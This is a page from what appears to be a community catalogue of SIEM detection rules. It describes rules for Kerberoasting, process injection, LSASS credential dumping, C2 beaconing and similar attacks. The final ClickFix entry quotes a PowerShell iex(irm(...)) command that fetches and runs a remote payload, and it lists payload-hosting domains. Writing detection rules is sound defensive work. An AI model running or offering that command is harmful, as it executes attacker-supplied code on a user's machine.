Detections

Explore public detection logic contributed by the community across SIEM and rule languages.

39,169 detections

Detects the creation of WMI permanent event subscriptions, including the instantiation of __EventFilter, __EventConsumer, and __FilterToConsumerBinding classes. This mechanism is frequently used by adversaries for fileless and reboot-resilient persistence, as it allows for arbitrary code execution triggered by system events.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
This rule detects potential Kerberoasting activity by monitoring Windows Security Event ID 4769 for TGS service ticket requests using weak RC4 encryption (etype 0x17). It correlates these individual requests to identify a single user account requesting an abnormally high volume of service tickets within a 10-minute window, which is highly characteristic of automated SPN enumeration and cracking tools like Rubeus or Impacket.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
Detects instances where a digitally signed executable loads a DLL from a non-standard, user-writable directory (such as Downloads, Desktop, Temp, or AppData). This behavior is characteristic of DLL side-loading, an evasion technique used to execute malicious code by placing a rogue DLL in a location where a legitimate binary might search for its dependencies, often used by threat actors to persist or maintain covert execution.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
Detects lateral movement activities involving the use of PsExec-style tools or the manual creation of remote services to execute commands. This behavior often leverages SMB admin shares (ADMIN$, C$) to drop and execute binaries or scripts, a technique frequently observed in ransomware campaigns and red team engagements.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
This rule detects artifacts and command-line patterns associated with Impacket utility suite modules, specifically wmiexec.py, smbexec.py, and secretsdump.py. These tools are commonly used by adversaries for remote command execution, lateral movement, and dumping of sensitive domain or system credentials.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
Detects the execution of legitimate developer utilities msbuild.exe, regasm.exe, and regsvcs.exe in manners consistent with malicious proxy execution. This includes the use of inline tasks in project files, remote network-sourced project files, or specific command-line arguments (such as /codebase or /unregister) that suggest the abuse of these binaries to execute arbitrary code or bypass application control mechanisms, while excluding known legitimate developer-related parent processes and build workflows.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
Detects Microsoft Office applications or scripting engines spawning schtasks.exe to create or modify a scheduled task that executes as the SYSTEM user upon system startup or login. This behavior is highly indicative of persistence mechanisms used by malicious documents or scripts.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
This rule detects potential Kerberoasting activity by monitoring Kerberos TGS requests (Event ID 4769) that use RC4 encryption (0x17 or 17). It identifies accounts requesting TGS tickets for a large number of unique Service Principal Names (SPNs), excluding requests for host-based services (ending in $). High volumes of such requests from a single user are indicative of an attempt to gather service tickets for offline password cracking.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
This rule detects potential AS-REP Roasting attempts by identifying an unusually high volume of Kerberos AS-REQ requests (Event ID 4768) where the preauthentication type is set to 0. These requests are grouped by source IP or client address, and alerts are triggered when the number of unique accounts targeted or the total request count exceeds defined thresholds. AS-REP Roasting is an attack technique that attempts to retrieve a TGT for user accounts that have Kerberos preauthentication disabled, making them susceptible to offline brute-force password cracking.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
This rule detects potential Kerberoasting activity by monitoring Kerberos TGS requests (Event ID 4769) that use RC4 encryption (0x17 or 17). It identifies accounts requesting TGS tickets for a large number of unique Service Principal Names (SPNs), excluding requests for host-based services (ending in $). High volumes of such requests from a single user are indicative of an attempt to gather service tickets for offline password cracking.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
This rule detects potential AS-REP Roasting attempts by identifying an unusually high volume of Kerberos AS-REQ requests (Event ID 4768) where the preauthentication type is set to 0. These requests are grouped by source IP or client address, and alerts are triggered when the number of unique accounts targeted or the total request count exceeds defined thresholds. AS-REP Roasting is an attack technique that attempts to retrieve a TGT for user accounts that have Kerberos preauthentication disabled, making them susceptible to offline brute-force password cracking.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
Detects persistence modification via Registry Run/RunOnce keys or the addition of suspicious files to the Windows Startup folder. The rule specifically monitors for registry values pointing to common volatile directories, script extensions, or suspicious command-line interpreters. It also flags new executables or scripts being written directly into startup directory paths. This rule covers both direct registry manipulation and startup folder placement, often associated with malware or adversary persistence mechanisms.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
Detects anomalous Kerberos TGT (AS-REQ/AS-REP) activity using Event ID 4768. The rule identifies two scenarios: (1) TGT requests that fail with specific status codes indicating issues with the account (disabled, nonexistent, or locked), and (2) TGT requests that utilize RC4 encryption with classic Golden Ticket flags (renewable/forwardable). These patterns are indicative of potential Kerberos abuse, including attempts to use compromised accounts or forged golden tickets.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
This rule detects potential process injection activity where a process is created in a suspended state and subsequently performs memory unmapping followed by a remote memory write operation. This behavior targets critical system processes such as svchost, explorer, lsass, services, and spoolsv, which is highly indicative of process hollowing or similar injection techniques used by malicious actors.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
Detects the creation of a remote thread in a process by another process, excluding self-injection. This behavior is a common indicator of process injection techniques used to execute code within the address space of a target process.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
Detects processes attempting to obtain high-privileged handles (e.g., VM_READ/ALL_ACCESS) to the lsass.exe process. Accessing lsass.exe is a common method for credential dumping, often used by malware or red-team tools to extract sensitive credentials from memory. This rule monitors process access events and ignores known benign or administrative processes that legitimately access LSASS.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
This rule detects potential command-and-control (C2) activity by correlating the creation of known Cobalt Strike or Sliver framework named pipes with subsequent repeated HTTP/S network beaconing from the same process or host. The rule identifies processes establishing suspicious named pipes, then looks for persistent network connections to standard web ports (80, 443) within a 30-minute window, flagging instances where significant beaconing count is observed.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
This rule detects potential DNS tunneling activities often used for Command and Control (C2) communication. It monitors for high volumes of DNS requests involving records commonly abused for tunneling (TXT, NULL, CNAME) from a single host to a specific parent domain. It further identifies suspicious patterns characterized by long, high-entropy subdomain labels (>45 characters) and a high frequency of distinct labels, which are indicative of encoded C2 traffic.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
Detects the loading of known vulnerable kernel drivers commonly used for Bring Your Own Vulnerable Driver (BYOVD) attacks, followed within 15 minutes by administrative attempts to stop, delete, or kill common security product processes or services.
avatar
Ibrahim Saud@tektrix
avatar
Detections.ai Community
8 days ago
000
Detects a non-browser process initiating network connections to four distinct commercial LLM API providers (DeepSeek, OpenRouter, Mistral, and Google Gemini) within a 5-minute interval. This behavior is indicative of a C2 pattern where an adversary uses multiple LLM backends to perform plurality-vote or redundant queries, bypassing typical browser-based AI aggregation services.
avatar
Arnold Chan@slaz
avatar
Detections.ai Community
15 days ago
004
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
avatar
Ankit Mehta@Secvyn
avatar
Hunters
15 days ago
104
Page 72 of 1866